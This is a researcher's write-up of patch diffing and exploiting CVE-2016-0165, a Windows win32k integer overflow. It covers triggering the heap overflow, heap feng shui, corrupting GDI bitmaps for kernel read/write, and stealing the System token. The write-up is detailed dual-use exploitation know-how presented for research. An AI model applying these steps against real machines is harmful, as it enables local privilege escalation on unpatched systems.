On April 12, 2016 Microsoft released 13 security bulletins.
Let’s to talk about how I triggered and exploited the CVE-2016-0165, one of the MS16-039 fixes.
Diffing Stage
For MS16-039, Microsoft released a fix for all Window versions, either for 32 and 64 bits.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 y CVE-2016-0167.
Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».
It’s interesting to say that this function started to be exported since Windows 10, when «win32k.sys» was split into 3 parts: «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».
If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.
In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.
Summing up, two integer overflows were patched in the same function.
Understanding the fix
If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:
"lea ecx,[rax+rax*2]"
In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).
At the same time, we can see that the structs number is represented by a 64 bit register, but the destination of this calculation is a 32 bit register!
Now, we know that it’s an integer overflow, the only thing we need to know is what number multiplied by 3 gives us a bigger result than 4GB.
The idea is that this result can’t be represented by a 32 bit number.
A simple way to know that is making the next calculation:
(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)
Now, if we multiplied this result by 3, we will obtain the next one:
0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes
In the same basic block and two instructions below («shl ecx,4»), we can see that the number «2» obtained previously will be shifted 4 times to the left, which is the same to multiply this one by 16, resulting in the 0x20 value.
So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂
Path to the vulnerability
For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls directly to the vulnerable function.
From user space, this function is located in «gdi32.dll» and it’s exported as «PathToRegion«.
Triggering the vulnerability
Now we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability but, is it possible to
reach this number of POINTs?
In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo«.
Looking at the documentation, we see this definition:
BOOL PolylineTo( _In_ HDC hdc, _In_ const POINT *lppt, _In_ DWORD cCount );
The second argument is a POINT struct array and the third one is the array size.
It’s easy to think that, if we create 0x55555556 structs and then, we pass this structures as parameter we will trigger the vulnerability but WE WON’T, let’s see why.
If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».
«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.
If we see this function, there is a check in the POINT struct number passed as argument:
The maximum POINTs number that we can pass as parameter is 0x4E2000.
It’s clear that there is not a direct way to reach the wanted number to trigger this vulnerability, so what is the trick ?
Well, after some tests, the answer was pretty simple: «call many times to PolylineTo until reach the wanted number of POINT structs».
And the result was this:
The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.
PALLOCMEM2 function — «Bonus Track»
Triggering this vulnerability is relatively easy in 64 bit targets like Windows 8, 8.1 y 10.
Now, in «Windows 7» 64 bits, the vulnerability is very difficult to exploit.
Let’s see the vulnerable basic block and the memory allocator function:
The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register like Windows versions mentioned before.
The only feasible way to produce an integer overflow is with the previous instruction:
In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to get a kernel memory exhaustion than allocate this number of structures.
Now, why Windows 7 is different to the latest Windows versions ?
Well, if we look the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».
What is the difference ?
The «PALLOCMEM2» function receives a 32 bit argument size, but the «__imp_ExAllocatePoolWithTag» function receives a 64 bit argument size.
The argument type defines how the result of the multiplication will be passed to the function allocator, in this case, the result is casted to «unsigned int».
We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now they call «PALLOCMEM2» have been exposed to integer overflows much easier to exploit.
Analyzing the heap overflow
Once we trigger the integer overflow, we have to understand what the consequences are.
As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».
This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.
It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that it would destroy a big part of the Windows kernel heap, which quickly would give us a BSoD.
What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the the vulnerable function.
The trick here is that only POINT structs are copied when coordinates ARE NOT REPEATED.
E.g: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.
Thus, it’s possible to control exactly how many structures will be used by the heap overflow.
Some exploitation considerations
One of the most important things to know before to start to write the exploit is that, the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since this is used only temporarily.
It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.
Unfortunately, only some values to be overwritten are totally controlled by us, so, we are not able to overwrite the next chunk header with its original content.
On the other hand, we could think the alloc/free operation like «atomic», because we don’t have control execution until the «PathToRegion» function returns.
So, How is it possible to successfully exploit this vulnerability ?
Four years ago I explained something similar in the»The Big Trick Behind Exploit MS12-034» blogpost.
Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.
So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.
Finding the best memory allocator
Considering the previous one, now it’s necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.
When heap spray requires several interactions, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», making reference to the ancient Chinese technique (https://en.wikipedia.org/wiki/Feng_shui).
The POOL TYPE used by the vulnerable function is 0x21, which according to Microsoft means «NonPagedPoolSession» + «NonPagedPoolExecute».
Knowing this, it’s necessary to find some function that allow us to allocate memory in this pool type with the best possible accuracy.
The best function that I have found to heap spray the pool type 0x21 is via the «ZwUserConvertMemHandle» undocumented function, located in «gdi32.dll» and «user32.dll».
When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».
If we look at the «ConvertMemHandle» code, we can see the perfect allocator:
Basically, this function receives 2 parameters, BUFFER and SIZE and returns a HANDLE.
If we only see the yellow basic blocks, we can see that the «HMAllocObject» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.
To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard«.
Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.
Choosing GDI objects to be overwritten
Now, we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.
Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.
In that blogpost he described how GDI objects are composed:
typedef struct { BASEOBJECT64 BaseObject; SURFOBJ64 SurfObj; [...] } SURFACE64;
As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».
In my case, the problem is that I don’t control all values to be overwritten by the heap overflow, so, I can’t overwrite this property with an USEFUL ADDRESS.
A variant of abusing GDI object
Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.
After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.
This picture shows the content of the GDI object, before and after the heap overflow:
The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set with the 0xFFFFFFFF value.
It means that now the GDI object is width=0xFFFFFFFF and height=0x01.
So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!
Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed by «SURFOBJ64.pvScan0» is contiguous to the object properties.
With all these things, it was time to write an exploit …
Exploitation — Step 1
In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.
So, the new calculation is:
0x55555557 x 3 = 0x1'0000'0005
As the result is a 32 bit number, we get 0x5, an then this number is multiplied by 16
0x5 << 4 = 0x50
It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.
The reason why I decided to increase the size by 0x30 bytes is because very small chunk allocations are not always predictable.
Adding the chunk header size (0x10 bytes), the heap spray to do should be like this:
Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.
For alignment problems between the used small chunk and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.
Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.
Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.
Exploitation — Step 1.5
Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.
As the heap spray uses a big number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.
Looking at the function prototype:
HBITMAP CreateBitmap( _In_ int nWidth, _In_ int nHeight, _In_ UINT cPlanes, _In_ UINT cBitsPerPel, _In_ const VOID *lpvBits );
As an example, we could create a GDI object like this:
CreateBitmap (100, 100, 1, 32, lpvBits);
Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits) it will fail, except if this object has been overwritten afterwards.
So, the way to detect which GDI object has been modified is to check when its behavior is different than expected.
Exploitation — Step 2
Now we can read/write beyond the GDI object limits, we could use this new skill to overwrite a second GDI object, and thus, to get an arbitrary write.
Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after from the first one.
So, if from the first GDI object, we are able to write the contiguous memory that we want, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.
Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.
Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.
It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.
On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.
Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.
Exploitation — Final Stage
Once we get a kernel read/write primitive, we could say that the last step is pretty simple.
The idea is to steal the «System» process token and set it to our process (exploit.exe).
As this attack is done from «Low Integrity Level», we have to know that it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so, we have to take the long way.
The EPROCESS list is a linked list, where every element is a EPROCESS struct that contains information about a unique running process, including its TOKEN.
This list is pointed by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we could get the «PsInitialSystemProcess» kernel address, and then to do the famous TOKEN KIDNAPPING.
The best way I know of leaking a Windows kernel address is by using the «sidt» user-mode instruction.
This instruction returns the size and address of the operating system interrupt list located in kernel space.
Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.
The next step is to read backwards several «ntoskrnl.exe» memory addresses until you find the well known «MZ», which means it’s the base address of «ntoskrnl.exe».
Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then to use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.
As a result of what I explained before, I obtained this:
Final notes
It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.
However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all kernel exploit mitigations implemented until now.